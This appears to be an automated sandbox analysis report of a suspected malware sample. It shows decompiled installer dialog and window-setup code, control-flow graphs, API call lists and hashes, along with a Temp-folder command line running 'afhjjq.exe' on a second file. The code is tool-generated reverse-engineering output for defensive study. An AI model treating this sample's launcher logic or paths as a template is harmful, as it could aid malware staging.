                            control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                            C-Code - Quality: 84%
                            			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                            0x004040d0
                            0x004040d7
                            0x0040423e
                            0x00404242
                            0x00404246
                            0x00404248
                            0x0040424d
                            0x00404258
                            0x00404263
                            0x00404268
                            0x0040426a
                            0x0040426c
                            0x0040426f
                            0x00404274
                            0x00404282
                            0x0040428f
                            0x00404296
                            0x00404296
                            0x00404297
                            0x00404297
                            0x0040429c
                            0x004042a2
                            0x004042a9
                            0x004042af
                            0x004042b1
                            0x004042f1
                            0x004042f6
                            0x004042fb
                            0x004042fb
                            0x00404300
                            0x00404309
                            0x0040430b
                            0x00404310
                            0x00404316
                            0x0040431a
                            0x0040431a
                            0x0040431f
                            0x00404325
                            0x00000000
                            0x00000000
                            0x00404330
                            0x00404336
                            0x00000000
                            0x00000000
                            0x0040433f
                            0x00404347
                            0x0040434c
                            0x0040434f
                            0x00404355
                            0x0040435a
                            0x0040435d
                            0x00404363
                            0x00404368
                            0x0040436b
                            0x00404371
                            0x00404379
                            0x0040437f
                            0x00404385
                            0x00404389
                            0x00404390
                            0x00404390
                            0x00404390
                            0x0040439a
                            0x004043ac
                            0x004043b8
                            0x004043bd
                            0x004043c7
                            0x004043cd
                            0x004043cf
                            0x004043d4
                            0x004043d1
                            0x004043d1
                            0x004043d1
                            0x004043e4
                            0x004043fc
                            0x004043fe
                            0x00404404
                            0x00404419
                            0x00404406
                            0x0040440f
                            0x00404411
                            0x00404411
                            0x0040441f
                            0x00404430
                            0x00404446
                            0x0040444d
                            0x00404453
                            0x00404457
                            0x0040445c
                            0x0040445e
                            0x00000000
                            0x00404464
                            0x00404464
                            0x00404466
                            0x00000000
                            0x00000000
                            0x0040446c
                            0x00404470
                            0x00404495
                            0x0040449b
                            0x004044a1
                            0x004044a3
                            0x00000000
                            0x00000000
                            0x004044c9
                            0x004044cf
                            0x004044d1
                            0x004044d6
                            0x00000000
                            0x00000000
                            0x004044dc
                            0x004044df
                            0x004044e2
                            0x004044f9
                            0x00404505
                            0x0040451e
                            0x00404524
                            0x00404528
                            0x0040452d
                            0x00404533
                            0x00000000
                            0x00000000
                            0x0040453d
                            0x00404548
                            0x00000000
                            0x00404548
                            0x00404472
                            0x00404478
                            0x00000000
                            0x00000000
                            0x0040447e
                            0x00404484
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040448a
                            0x0040445e
                            0x00404555
                            0x00404561
                            0x00404568
                            0x00000000
                            0x004042b3
                            0x004042b3
                            0x004042b6
                            0x004042e9
                            0x004042e9
                            0x004042eb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004042eb
                            0x004042b8
                            0x004042bc
                            0x004042c1
                            0x004042c3
                            0x00000000
                            0x00000000
                            0x004042d3
                            0x004042db
                            0x00000000
                            0x004042e1
                            0x004040e9
                            0x004040e9
                            0x004040ed
                            0x004040f2
                            0x00404101
                            0x00404101
                            0x00404107
                            0x0040410e
                            0x00404152
                            0x00404158
                            0x00404171
                            0x00404174
                            0x00404187
                            0x0040418d
                            0x00000000
                            0x00000000
                            0x00404193
                            0x0040419e
                            0x004041a0
                            0x004041a2
                            0x004041c1
                            0x004041c1
                            0x004041c4
                            0x004041c9
                            0x004041cc
                            0x004041dc
                            0x004041dd
                            0x004041df
                            0x00404215
                            0x00404225
                            0x00000000
                            0x00404225
                            0x004041e1
                            0x004041e7
                            0x00404200
                            0x00404205
                            0x00404207
                            0x00000000
                            0x00000000
                            0x00404209
                            0x004041f5
                            0x004041f5
                            0x004041f7
                            0x004041f7
                            0x00000000
                            0x004041f7
                            0x004041ea
                            0x004041ef
                            0x00000000
                            0x004041ef
                            0x004041ce
                            0x004041d4
                            0x00000000
                            0x00000000
                            0x004041d6
                            0x00000000
                            0x004041d6
                            0x004041c6
                            0x00000000
                            0x004041c6
                            0x004041ac
                            0x004041b3
                            0x004041b9
                            0x004041bb
                            0x00404591
                            0x00000000
                            0x00404591
                            0x00000000
                            0x004041bb
                            0x00404179
                            0x00000000
                            0x00404181
                            0x00404160
                            0x00404166
                            0x0040456e
                            0x0040456e
                            0x00404574
                            0x00404581
                            0x00404587
                            0x00404587
                            0x00000000
                            0x00404110
                            0x00404115
                            0x00404121
                            0x0040412a
                            0x0040422b
                            0x00000000
                            0x00404149
                            0x0040414c
                            0x00000000
                            0x0040414c
                            0x0040412a
                            0x0040410e

                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                            • ShowWindow.USER32(?), ref: 00404121
                            • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                            • ShowWindow.USER32(?,00000004), ref: 0040414C
                            • DestroyWindow.USER32 ref: 00404160
                            • SetWindowLongW.USER32 ref: 00404179
                            • GetDlgItem.USER32 ref: 00404198
                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                            • IsWindowEnabled.USER32(00000000), ref: 004041B3
                            • GetDlgItem.USER32 ref: 0040425E
                            • GetDlgItem.USER32 ref: 00404268
                            • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                            • GetDlgItem.USER32 ref: 00404379
                            • ShowWindow.USER32(00000000,?), ref: 0040439A
                            • EnableWindow.USER32(?,?), ref: 004043AC
                            • EnableWindow.USER32(?,?), ref: 004043C7
                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                            • EnableMenuItem.USER32 ref: 004043E4
                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                            • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                            • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                            • ShowWindow.USER32(?,0000000A), ref: 00404581
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                            • String ID: H7B
                            • API String ID: 2475350683-2300413410
                            • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                            • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                            • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                            • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                            C-Code - Quality: 96%
                            			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                            0x00403d1d
                            0x00403d26
                            0x00403d2d
                            0x00403d2f
                            0x00403d43
                            0x00403d55
                            0x00403d5e
                            0x00403d67
                            0x00403d6e
                            0x00403d73
                            0x00403d7a
                            0x00403d8d
                            0x00403d8d
                            0x00403d98
                            0x00403d31
                            0x00403d3c
                            0x00403d3c
                            0x00403d9d
                            0x00403da7
                            0x00403db0
                            0x00403db5
                            0x00403dc6
                            0x00403e58
                            0x00403e60
                            0x00403e69
                            0x00403e69
                            0x00403e7f
                            0x00403e85
                            0x00403e93
                            0x00403f14
                            0x00403f1c
                            0x00403f26
                            0x00403f2b
                            0x00403f31
                            0x00403fbb
                            0x00403fc0
                            0x00403fc2
                            0x00403fde
                            0x00000000
                            0x00403fde
                            0x00403fc4
                            0x00403fca
                            0x00403fd2
                            0x00403fd2
                            0x00000000
                            0x00403fca
                            0x00403f3f
                            0x00403f4a
                            0x00403f4f
                            0x00403f51
                            0x00403f58
                            0x00403f58
                            0x00403f63
                            0x00403f6b
                            0x00403f6d
                            0x00403f6f
                            0x00403f78
                            0x00403f7b
                            0x00403f81
                            0x00403f81
                            0x00403fa0
                            0x00403fb1
                            0x00000000
                            0x00403fb6
                            0x00403f1e
                            0x00403f20
                            0x00000000
                            0x00403e95
                            0x00403e95
                            0x00403ea1
                            0x00403eab
                            0x00403eb1
                            0x00403eb6
                            0x00403ec5
                            0x00403fe3
                            0x00403fe3
                            0x00000000
                            0x00403fe3
                            0x00403ed4
                            0x00403f0f
                            0x00000000
                            0x00403f0f
                            0x00403dcc
                            0x00403dcc
                            0x00403dcf
                            0x00403dd1
                            0x00000000
                            0x00000000
                            0x00403ddf
                            0x00403df1
                            0x00403df6
                            0x00403dff
                            0x00000000
                            0x00000000
                            0x00403e05
                            0x00403e07
                            0x00403e14
                            0x00403e14
                            0x00403e1d
                            0x00403e23
                            0x00403e4b
                            0x00403e53
                            0x00000000
                            0x00403e35
                            0x00403e36
                            0x00403e3f
                            0x00403e45
                            0x00403e46
                            0x00000000
                            0x00403e46
                            0x00403e41
                            0x00403e43
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00403e43
                            0x00403e23

                            APIs
                              • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                              • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                            • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,?,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,766DFAA0), ref: 00403E18
                            • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,?,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                            • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,00000000,?), ref: 00403E36
                            • LoadImageW.USER32 ref: 00403E7F
                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                            • RegisterClassW.USER32 ref: 00403EBC
                            • SystemParametersInfoW.USER32 ref: 00403ED4
                            • CreateWindowExW.USER32 ref: 00403F09
                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                            • GetClassInfoW.USER32 ref: 00403F6B
                            • GetClassInfoW.USER32 ref: 00403F78
                            • RegisterClassW.USER32 ref: 00403F81
                            • DialogBoxParamW.USER32 ref: 00403FA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
